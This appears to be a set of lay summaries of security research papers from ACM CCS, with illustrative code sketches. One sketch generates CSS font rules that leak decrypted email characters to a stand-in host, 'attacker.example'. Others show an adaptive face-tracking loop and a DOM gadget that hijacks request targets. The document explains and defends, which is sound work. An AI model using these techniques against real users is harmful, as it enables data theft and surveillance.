The ACM Conference on Computer and Communications Security (CCS) is the flagship annual conference of the Special Interest Group on Security, Audit and Control (SIGSAC) of the Association for Computing Machinery (ACM). The conference brings together information security researchers, practitioners, developers, and users from all over the world to explore cutting-edge ideas and results.
When different groups want to train an AI model together, they must protect their data. One way is to add random noise to the calculations so that no one can see which data came from whom. There are two main options: either each group adds its own noise, which requires a lot of noise and makes results less accurate, or the noise is generated jointly in a secure computation, which keeps accuracy but has been very slow and communication-heavy until now.
The researchers present a new method to solve this. Instead of generating the noise through a complex secure computation, they propose drawing it from precomputed tables that approximate the required distribution. This makes the process much faster and reduces communication. In their experiments, the new method was over 200 times faster than earlier approaches and still scaled well to many participants. It is also flexible and can be used with different types of noise.
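To illustrate the table-based idea, here is a minimal Python sketch: a cumulative-distribution table for a truncated discrete Laplace distribution is precomputed once, and each noise draw is then a single table lookup. The distribution, truncation bound, and scale are illustrative assumptions; the paper's machinery for doing this jointly inside a secure computation is not shown.

```python
import bisect
import math
import random

def build_table(scale: float, support: int = 64):
    """Precompute a CDF table for a truncated discrete Laplace
    distribution with the given scale (illustrative choice)."""
    ks = list(range(-support, support + 1))
    weights = [math.exp(-abs(k) / scale) for k in ks]
    total = sum(weights)
    cdf, acc = [], 0.0
    for w in weights:
        acc += w / total
        cdf.append(acc)
    return ks, cdf

def sample_noise(ks, cdf):
    """Draw one noise value via inverse-transform table lookup."""
    u = random.random()
    return ks[bisect.bisect_left(cdf, u)]

ks, cdf = build_table(scale=2.0)
noisy_sum = 1234 + sample_noise(ks, cdf)  # perturb an aggregate value
print(noisy_sum)
```

Because the expensive part (building the table) happens once up front, each party only pays for cheap lookups at run time, which is where the speedup over computing the noise inside the protocol comes from.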
For society, this means that secure collaboration with sensitive data becomes easier. Different organizations can train AI models together without revealing private information, while still achieving good model accuracy.
The researchers conducted a comprehensive analysis of the Security Protocol and Data Model (SPDM) version 1.2, a standard supported by major technology companies to secure communication between hardware components and in cloud environments. While earlier studies examined only parts of the protocol, this work is the first to model and analyze the entire protocol with the Tamarin prover. Surprisingly, the analysis uncovered a severe vulnerability: in one operating mode, an attacker could bypass authentication completely. The team implemented the attack, reported it to the developers, and it was registered as a critical security issue (CVE, severity 9 out of 10).
The researchers then proposed a fix and produced the first formal security proof for the corrected version of the protocol. This fix has now been integrated into both the reference software and the official standard.
The study highlights that analyzing isolated parts of a security protocol is insufficient; only a holistic approach can reveal vulnerabilities caused by complex interactions. For society, this work strengthens trust in the security of IT infrastructure, particularly in cloud computing and secure hardware. It helps ensure that weaknesses are identified and resolved before they can be exploited on a large scale.
The researchers reveal that current state-of-the-art anti-facial recognition (AFR) defenses mainly evaluate against static facial recognition (FR) tracking strategies, which fail to reflect the capabilities of determined, adaptive attackers. To address this gap, they introduce DynTracker — a simple yet powerful attack method that dynamically updates its gallery database with newly detected images, enabling continuous tracking.
To defend against such adaptive threats, the authors propose DivTrackee, a system that enhances the diversity of AFR perturbations using text-guided image generation and mechanisms that explicitly reduce similarity among modified images. Experimental results show that while DynTracker completely bypasses existing AFR defenses, DivTrackee substantially reduces its success rate while maintaining high visual fidelity.
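The core of the adaptive attack is a self-reinforcing gallery. A minimal Python sketch of that loop follows; the embedding function, threshold, and inputs are hypothetical stand-ins, since a real tracker would use an actual face-recognition model.

```python
import numpy as np

def embed(image) -> np.ndarray:
    """Hypothetical stand-in for a face-embedding model; returns a
    unit vector derived deterministically from the input."""
    rng = np.random.default_rng(abs(hash(image)) % (2**32))
    v = rng.normal(size=128)
    return v / np.linalg.norm(v)

def track(stream, seed_images, threshold=0.8):
    """Dynamic tracking: any image matching the gallery is added back
    into it, so later, differently-perturbed photos of the same person
    can still be matched."""
    gallery = [embed(img) for img in seed_images]
    matches = []
    for img in stream:
        e = embed(img)
        if max(float(e @ g) for g in gallery) >= threshold:
            matches.append(img)
            gallery.append(e)  # the key step: grow the gallery over time
    return matches

photos = [f"frame_{i}" for i in range(5)]
print(track(photos, seed_images=["target_seed"]))
```

DivTrackee's countermeasure targets exactly the `gallery.append` step: if consecutive protected images are sufficiently dissimilar, matching one does not help the tracker match the next.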
Overall, the study exposes the weaknesses of current AFR protections and highlights a more robust direction for preserving facial privacy against evolving recognition systems.
This study examines the security of web browsers, which execute countless scripts and programs from unknown sources every day. To reduce risks, modern browsers use software-based fault isolation (SFI), such as Google’s V8 heap sandbox, which protects billions of users by separating trusted data from an “untrusted” memory region.
The researchers point out that such mechanisms have seen little targeted testing so far. They therefore developed SbxBrk, a new testing tool that simulates realistic attackers by manipulating every memory access from trusted code into untrusted data. Applying this method to the V8 sandbox, they discovered 19 previously unknown vulnerabilities, including buffer overflows and memory errors that bypass the isolation.
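The attacker model can be pictured with a small conceptual sketch, shown here in Python even though the real tool instruments V8's C++ memory accesses; all names and the length-field bug are illustrative, not from the paper.

```python
import random

class UntrustedHeap:
    """Models the sandboxed ('untrusted') memory region. In the
    attacker model, every value trusted code reads from here may have
    been corrupted, so the harness mutates it on each access."""
    def __init__(self, data):
        self._data = dict(data)

    def read(self, field):
        value = self._data[field]
        if random.random() < 0.5:            # simulate attacker control
            value = random.randrange(0, 2**32)
        return value

def trusted_code(heap):
    """Trusted logic that naively trusts a length field read from the
    sandbox: the class of bug such testing is meant to surface."""
    length = heap.read("length")
    buffer = [0] * 16
    for i in range(length):   # out of bounds if length was corrupted
        if i >= len(buffer):
            raise MemoryError("sandbox escape: write outside buffer")
        buffer[i] = 1

try:
    trusted_code(UntrustedHeap({"length": 8}))
except MemoryError as e:
    print("bug found:", e)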
The findings highlight that even widely deployed protections can contain flaws and must be systematically tested. For society, this means that improved testing methods are essential to ensure the long-term security of core applications like browsers and cloud services.
Modern smartphones, laptops, and cloud servers rely heavily on ARM processors. These chips are designed with hidden performance features, like caches, that are meant to be invisible to everyday software. Unfortunately, researchers have long known that these hidden features can sometimes “leak” secrets through subtle clues—often measured using very precise timers.
But what happens when such timers are unavailable, as is increasingly the case on modern ARM systems?
A research team from CISPA Helmholtz Center for Information Security and Google developed ExfilState, a tool that automatically uncovers ways processors can still unintentionally reveal secrets—even without timers. Instead of measuring time, ExfilState looks for tiny differences in the processor's visible state, such as register values or error behavior, when its hidden cache is in different conditions.
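The search can be pictured as a differential loop: run the same instruction with a memory location cached and uncached, and diff the visible results instead of timing them. Below is a hedged Python skeleton of that loop; `flush`, `load`, and `run_and_capture` are hypothetical stubs standing in for real per-device drivers.

```python
def flush(addr):
    """Evict addr from the cache (stub)."""

def load(addr):
    """Bring addr into the cache (stub)."""

def run_and_capture(instr, addr):
    """Execute `instr` touching `addr` and return the visible state:
    registers, flags, and any fault raised. Stubbed with dummy data."""
    return {"regs": [0] * 4, "fault": None}

def find_channels(instructions, addr=0x1000):
    channels = []
    for instr in instructions:
        flush(addr)
        state_cold = run_and_capture(instr, addr)
        load(addr)
        state_hot = run_and_capture(instr, addr)
        if state_cold != state_hot:  # visible state depends on cache state
            channels.append(instr)
    return channels

print(find_channels(["LDR", "PRFM", "DC CVAC"]))
```

Any instruction whose architecturally visible outcome depends on the cache state is, by definition, a timer-free side channel.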
By testing 160 devices across 37 ARM processor designs, the team discovered five previously unknown “side channels”—hidden ways for information to leak. Two of these are widespread and reliable across nearly all tested ARM processors. They showed that attackers could use them to steal cryptographic keys from widely used encryption software, launch new timer-free versions of attacks like Spectre, and even build new defenses that stop attacks by detecting when sensitive data leaves the cache.
This research team examined how blind and low-vision individuals manage their passwords and how password managers support them. The study was based on interviews with 33 participants. All respondents used password managers to some extent, mainly because of the convenience of storing and auto-filling credentials. However, the core security feature—generating strong, random passwords—was rarely adopted. The main reason was a lack of practical accessibility: many functions were difficult to use or felt unreliable for people with visual impairments.
As a result, participants reported a sense of reduced control. Some turned to insecure alternatives, such as reusing simple passwords or recording sensitive credentials in braille notes. These strategies show that while password managers can be useful, their design often does not fully meet the needs of this user group.
The researchers highlight that improving accessibility and involving blind and low-vision users more closely in the design process is crucial. This would allow password managers to realize their full potential: making secure, random passwords easy to use without limiting users’ sense of autonomy.
For society, the takeaway is clear: digital security can only be inclusive if tools are designed to be equally usable by everyone. Better accessibility not only benefits people with disabilities but also strengthens overall trust and safety in digital life.
The researchers examine how well current image safety classifiers detect harmful content such as violence, hate, or sexual material. Most existing models are trained on real-world images, while AI-generated images increasingly pose new challenges. To evaluate this, they built UnsafeBench, a benchmark with over 10,000 annotated images (real and AI-generated, across eleven categories). They tested five common classifiers and three vision-language models (VLMs). Results show that conventional classifiers cover only limited categories and perform significantly worse on AI-generated images. They are also more vulnerable to manipulations. VLMs like GPT-4V perform better overall but still miss cases, such as hateful symbols.
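The kind of per-source breakdown such a benchmark enables can be sketched in a few lines of Python; the classifier and records below are invented placeholders, not data from UnsafeBench.

```python
def classify(image) -> bool:
    """Stand-in for a real safety classifier (True = flagged unsafe)."""
    return "unsafe" in image

records = [
    {"image": "real_unsafe_01", "source": "real",      "label": True},
    {"image": "gen_unsafe_01",  "source": "generated", "label": True},
    {"image": "gen_safe_01",    "source": "generated", "label": False},
]

for source in ("real", "generated"):
    subset = [r for r in records if r["source"] == source]
    correct = sum(classify(r["image"]) == r["label"] for r in subset)
    print(f"{source}: {correct}/{len(subset)} correct")
```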
To address these shortcomings, the team developed PerspectiveVision, a fine-tuned model trained on both real-world and AI-generated data. It improves both detection accuracy and robustness against adversarial attacks.
The study makes clear that existing moderation tools are not sufficient to handle the growing risks of AI-generated harmful content. For society, this underscores the need for stronger safeguards to keep online platforms safe.
The authors study how the Document Object Model (DOM) — the data structure JavaScript uses to read and modify pages — can serve as an unexpected attack surface. They define and detect “DOM gadgets”: benign code fragments that consume DOM data and can lead to security-sensitive effects beyond classic script injection, such as hijacking outgoing requests, enabling CSRF, or manipulating the user interface.
Using a hybrid static/dynamic analysis on the top 15k Tranco sites, the team analyzed 522k pages and 10.3 billion lines of JavaScript, identifying 2.6 million DOM-to-sink flows and verifying 357k gadget instances affecting roughly 15% of domains. They automatically found 657 gadgets with exploitable markup injection points across 37 sites, and observed that about 10% of flows lack validation or sanitization. The paper also presents four novel element-reordering techniques required to exploit a substantial subset of gadgets.
The work highlights that treating DOM reads as trusted input is common but insufficiently defended. For society, this indicates the need for web developers, browser vendors, and standards bodies to reassess the DOM’s role in trust boundaries and adopt detection and mitigation tools to reduce real-world risks in everyday web applications.
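To make the notion of a DOM-to-sink flow concrete, here is a toy Python sketch that scans a JavaScript fragment for a DOM read feeding a request sink. The snippet, the regexes, and the single-statement matching are illustrative simplifications; the paper's hybrid analysis tracks data flow properly.

```python
import re

# A toy "DOM gadget": benign-looking code that reads attacker-injectable
# markup and forwards it into a security-sensitive sink (the URL of an
# outgoing request). Invented for illustration, not taken from the paper.
snippet = """
var endpoint = document.getElementById('cfg').getAttribute('data-api');
fetch(endpoint + '/user', {method: 'POST', body: token});
"""

DOM_READS = r"(getElementById|querySelector)\([^)]*\)"
SINKS = r"\b(fetch|XMLHttpRequest|window\.location)\b"

reads = {m.group(0) for m in re.finditer(DOM_READS, snippet)}
if reads and re.search(SINKS, snippet):
    print("potential DOM-to-sink flow:", reads)
```

If an attacker can inject a `data-api` attribute into the page (markup injection, no script needed), the request target is hijacked, which is exactly the class of effect the gadgets in the study produce.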
The authors perform a differential evaluation of security-header parsing and enforcement across browsers. They run 177,146 parametrized tests for 16 headers across 16 browser configurations (covering >97% engine market share), amounting to over eleven million executions.
They identify 5,606 inconsistent test outcomes (3.16%) and trace these to 42 root causes; 31 were previously unknown and resulted in 36 bug reports to browser vendors and specification authors, many of which produced fixes. The paper introduces a clustering method for outcome analysis and publishes the testing framework as open source to enable continuous vendor testing; a follow-up run on updated browsers confirmed several fixes but revealed four additional root causes.
The study provides actionable evidence and tools to detect and remedy implementation divergences, thereby helping improve the consistency and practical effectiveness of web security headers.
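The clustering step can be sketched in a few lines: group test cases by their cross-browser outcome signature, so one root cause surfaces as one cluster. The test names and outcomes below are invented for illustration.

```python
from collections import defaultdict

results = {
    "xfo-nested-1": {"chromium": "blocked", "firefox": "blocked", "webkit": "allowed"},
    "xfo-nested-2": {"chromium": "blocked", "firefox": "blocked", "webkit": "allowed"},
    "csp-dup-1":    {"chromium": "first",   "firefox": "last",    "webkit": "first"},
}

# Group tests by their cross-browser outcome signature.
clusters = defaultdict(list)
for test, outcome in results.items():
    signature = tuple(sorted(outcome.items()))
    clusters[signature].append(test)

for signature, tests in clusters.items():
    outcomes = {o for _, o in signature}
    if len(outcomes) > 1:  # browsers disagree on these tests
        print("inconsistency cluster:", tests)
```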
The authors tackle a key challenge in securing networked embedded devices: existing rehosting fuzzers fail to penetrate complex, multi-layer network stacks and therefore miss deeply nested faults. They propose Pemu, a protocol-aware extension that actively probes firmware, parses outgoing low-level frames, infers addressing and protocol trees, and wraps raw fuzzing input into valid multi-layer packets so that fuzzed data reaches the transport and application layers.
Integrated with three rehosting fuzzers (Fuzzware, Hoedur, SEmu), Pemu increases average basic-block coverage by 40.7%, 39.2%, and 8.5% respectively, rediscovers known embedded-network-stack vulnerabilities, and finds five previously unknown bugs. The implementation and dataset are published. This work advances automated, scalable testing of embedded network stacks and thereby helps reduce the risk posed by software faults in connected devices.
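The packet-wrapping idea can be illustrated with a short Python sketch that encapsulates a raw fuzz payload in valid UDP/IPv4/Ethernet headers so it survives the lower layers of a target stack. Addresses, ports, and MACs are invented; Pemu itself infers such addressing from frames the firmware emits.

```python
import struct

def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum over the given bytes."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack(f"!{len(data)//2}H", data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return ~s & 0xFFFF

def wrap(payload: bytes, src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02") -> bytes:
    """Wrap raw fuzz input into a UDP/IPv4/Ethernet frame."""
    # UDP header: src port, dst port, length, checksum (0 = none for IPv4).
    udp = struct.pack("!HHHH", 1337, 7, 8 + len(payload), 0) + payload
    # IPv4 header: version/IHL, TOS, total length, id, flags/frag,
    # TTL, protocol 17 (UDP), checksum placeholder, src, dst.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    # Ethernet header: dst MAC, src MAC, EtherType IPv4.
    eth = b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00"
    return eth + ip + udp

frame = wrap(b"FUZZDATA")
print(len(frame), "bytes on the wire")
```

Without such wrapping, most random inputs are discarded by header validation before they ever reach the transport or application code being fuzzed.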
The authors address a bottleneck in automated verification of security protocols that involve loops or inductive structures, where tools like Tamarin can fail to terminate or require many manual auxiliary lemmas. They adapt cyclic proofs to Tamarin’s constraint-reduction setting: they formalize the approach, add controlled structural rules (weakening and cut), prove soundness, and develop heuristics for efficient backlink discovery. Their implementation yields more compact, automated proofs; across fourteen case studies — up to a detailed Signal model — many lemmas are proved with no, or far fewer, auxiliary lemmas (including message secrecy for Signal). The contribution improves automation for protocols with looping behavior. For society, this advances the practical ability to formally verify and thereby increase confidence in the security of communication protocols.
Every processor follows a specification called the Instruction Set Architecture (ISA). The ISA defines the basic instructions (like add, load, store) that software can use. RISC-V is an open ISA, meaning anyone can design their own compatible CPU. This openness has fueled a wave of new processors for laptops, servers, and embedded devices.
But while the specification is open, the designs of most actual CPUs remain proprietary—just like x86 or ARM processors. That makes it difficult for researchers to inspect them for hidden flaws.
A research team at CISPA developed RISCover, a tool that automatically checks real RISC-V CPUs for design errors without needing access to their internals. RISCover runs small test programs and compares results across different CPUs; if one behaves differently from the others, this often points to a bug or vulnerability.
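The differential approach can be sketched as a majority vote over CPUs; in the Python sketch below, `run_on` is a hypothetical stub, whereas the real tool executes test programs natively on each device.

```python
from collections import Counter

def run_on(cpu: str, program: bytes) -> str:
    """Stub: pretend to execute `program` on `cpu` and return its
    observable result. One CPU deviates, for illustration."""
    results = {"cpuA": "x=42", "cpuB": "x=42", "cpuC": "x=41", "cpuD": "x=42"}
    return results[cpu]

def differential_test(cpus, program):
    """Flag CPUs whose result differs from the majority outcome."""
    observed = {cpu: run_on(cpu, program) for cpu in cpus}
    majority, _ = Counter(observed.values()).most_common(1)[0]
    return [cpu for cpu, r in observed.items() if r != majority]

suspects = differential_test(["cpuA", "cpuB", "cpuC", "cpuD"], b"\x13\x00\x00\x00")
print("deviating CPUs:", suspects)  # -> ['cpuC']
```

The appeal of this design is that no golden reference model of the ISA is needed: the other CPUs collectively serve as the oracle.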
When tested on eight widely used CPUs, RISCover uncovered four serious flaws. The most critical, named GhostWrite (CVE-2024-44067), allows unprivileged software to overwrite physical memory and take full control of a system. The team also discovered instruction sequences that can instantly freeze a processor, creating a powerful denial-of-service attack.
Since hardware flaws cannot be fixed as easily as software bugs, early detection is vital. By revealing such vulnerabilities before attackers can exploit them, RISCover strengthens the security of the rapidly growing RISC-V ecosystem.
The research team studied how U.S. companies report on employee cybersecurity training in their official SEC 10-K filings. These are annual reports that publicly traded companies must submit to the U.S. Securities and Exchange Commission, covering finances, risks, and business practices. Since late 2023, they also include a section on cybersecurity.
From thousands of filings, the team found that about 78% of companies provide security awareness training. Some gave only vague statements, while others described detailed or mandatory programs. Employees were often portrayed as the weak link, easy to trick or posing insider risks. A smaller share of companies also mentioned measures such as multi-factor authentication (11%) or channels for reporting suspicious behavior (8%).
Companies that follow a cybersecurity framework developed by the National Institute of Standards and Technology (NIST), a U.S. government agency, were more likely to combine training with extra safeguards. Practices also varied by company size and industry.
This is the first large independent study to show how widespread cybersecurity training is in U.S. firms. The results give managers, CISOs, and policymakers a clearer picture for decisions and can help society invest more effectively in cybersecurity. All data and code were published to allow full replication of the study.
Encrypted emails are designed to keep sensitive information private, ensuring that only the sender and recipient can read them. Yet, researchers at CISPA have shown that attackers can still trick email clients into leaking secret messages.
The attack abuses CSS—the styling rules normally used to control fonts and layouts—to recover the full content of an encrypted email. By combining features such as custom fonts, container queries, and animations, the researchers demonstrate how each character of a decrypted message can be invisibly mapped to a network request. As soon as the victim opens the email, these requests silently transmit the text to the attacker, without requiring any interaction or showing any warning signs.
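The per-character trick can be sketched by generating font rules whose download doubles as a network beacon: when the client renders a character, it fetches the matching "font", telling the attacker's server which character appeared. The Python generator below is a hedged illustration; the URL is invented, and the real attack chains further CSS features such as container queries and animations to recover character positions.

```python
ATTACKER = "https://attacker.example/leak"  # illustrative attacker endpoint

def leak_rules(chars: str) -> str:
    """Emit one @font-face rule per character: unicode-range restricts
    the rule to a single code point, so the font (i.e., the beacon URL)
    is only fetched if that character occurs in the decrypted text."""
    rules = []
    for ch in chars:
        cp = ord(ch)
        rules.append(
            "@font-face {\n"
            "  font-family: leak;\n"
            f"  src: url('{ATTACKER}?cp={cp}');\n"
            f"  unicode-range: U+{cp:04X};\n"
            "}"
        )
    return "\n".join(rules) + "\nbody { font-family: leak; }"

print(leak_rules("ABC"))
```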
This research highlights that the real weakness lies not in the encryption itself but in how email clients handle formatting. The work establishes that CSS must be considered a serious security risk and calls for stronger content isolation in email clients. The research project led to changes in major software projects, including updates to Mozilla Thunderbird and Meta's Code Verify.
Cryptography competitions often contribute to the development and standardization of new cryptographic schemes. They help select primitives and algorithms that solve specific cryptographic problems securely and efficiently from a list of candidate submissions. Over the last decades, several competitions held by NIST and other research and regulatory organizations resulted in standards for, e.g., symmetric and asymmetric encryption, hashing, digital signatures, and, most recently, quantum-secure cryptography. However, while these competitions fostered much technical research on the submitted schemes, little is currently known about the human aspects of their processes, how they shape the competition results, and their perceived impact on cryptography security.
To investigate these human aspects, the researchers interviewed 20 experienced cryptography competition participants about their experiences, their assessment of the competitions' impact and its determinants, and their suggestions for future events. They find that competitions bring attention to a cryptography area, provide research focus and motivation, and establish trust in schemes through community scrutiny and collaboration. Participants highlighted the criticality of transparency, fairness, and trustworthiness of the competition organizer, emphasizing a need for clear and open communication.
Based on these findings, the authors suggest strategies for future competitions to maximize engagement and provide transparent, trustworthy processes and results. They recommend stronger moderation of social conduct on official channels to ensure fairness and avoid putting off potential contributors. They also find that substantial industry involvement and systematic feedback collection are critical. Transparent organization and evaluation elevate a competition and foster secure and well-adopted standards.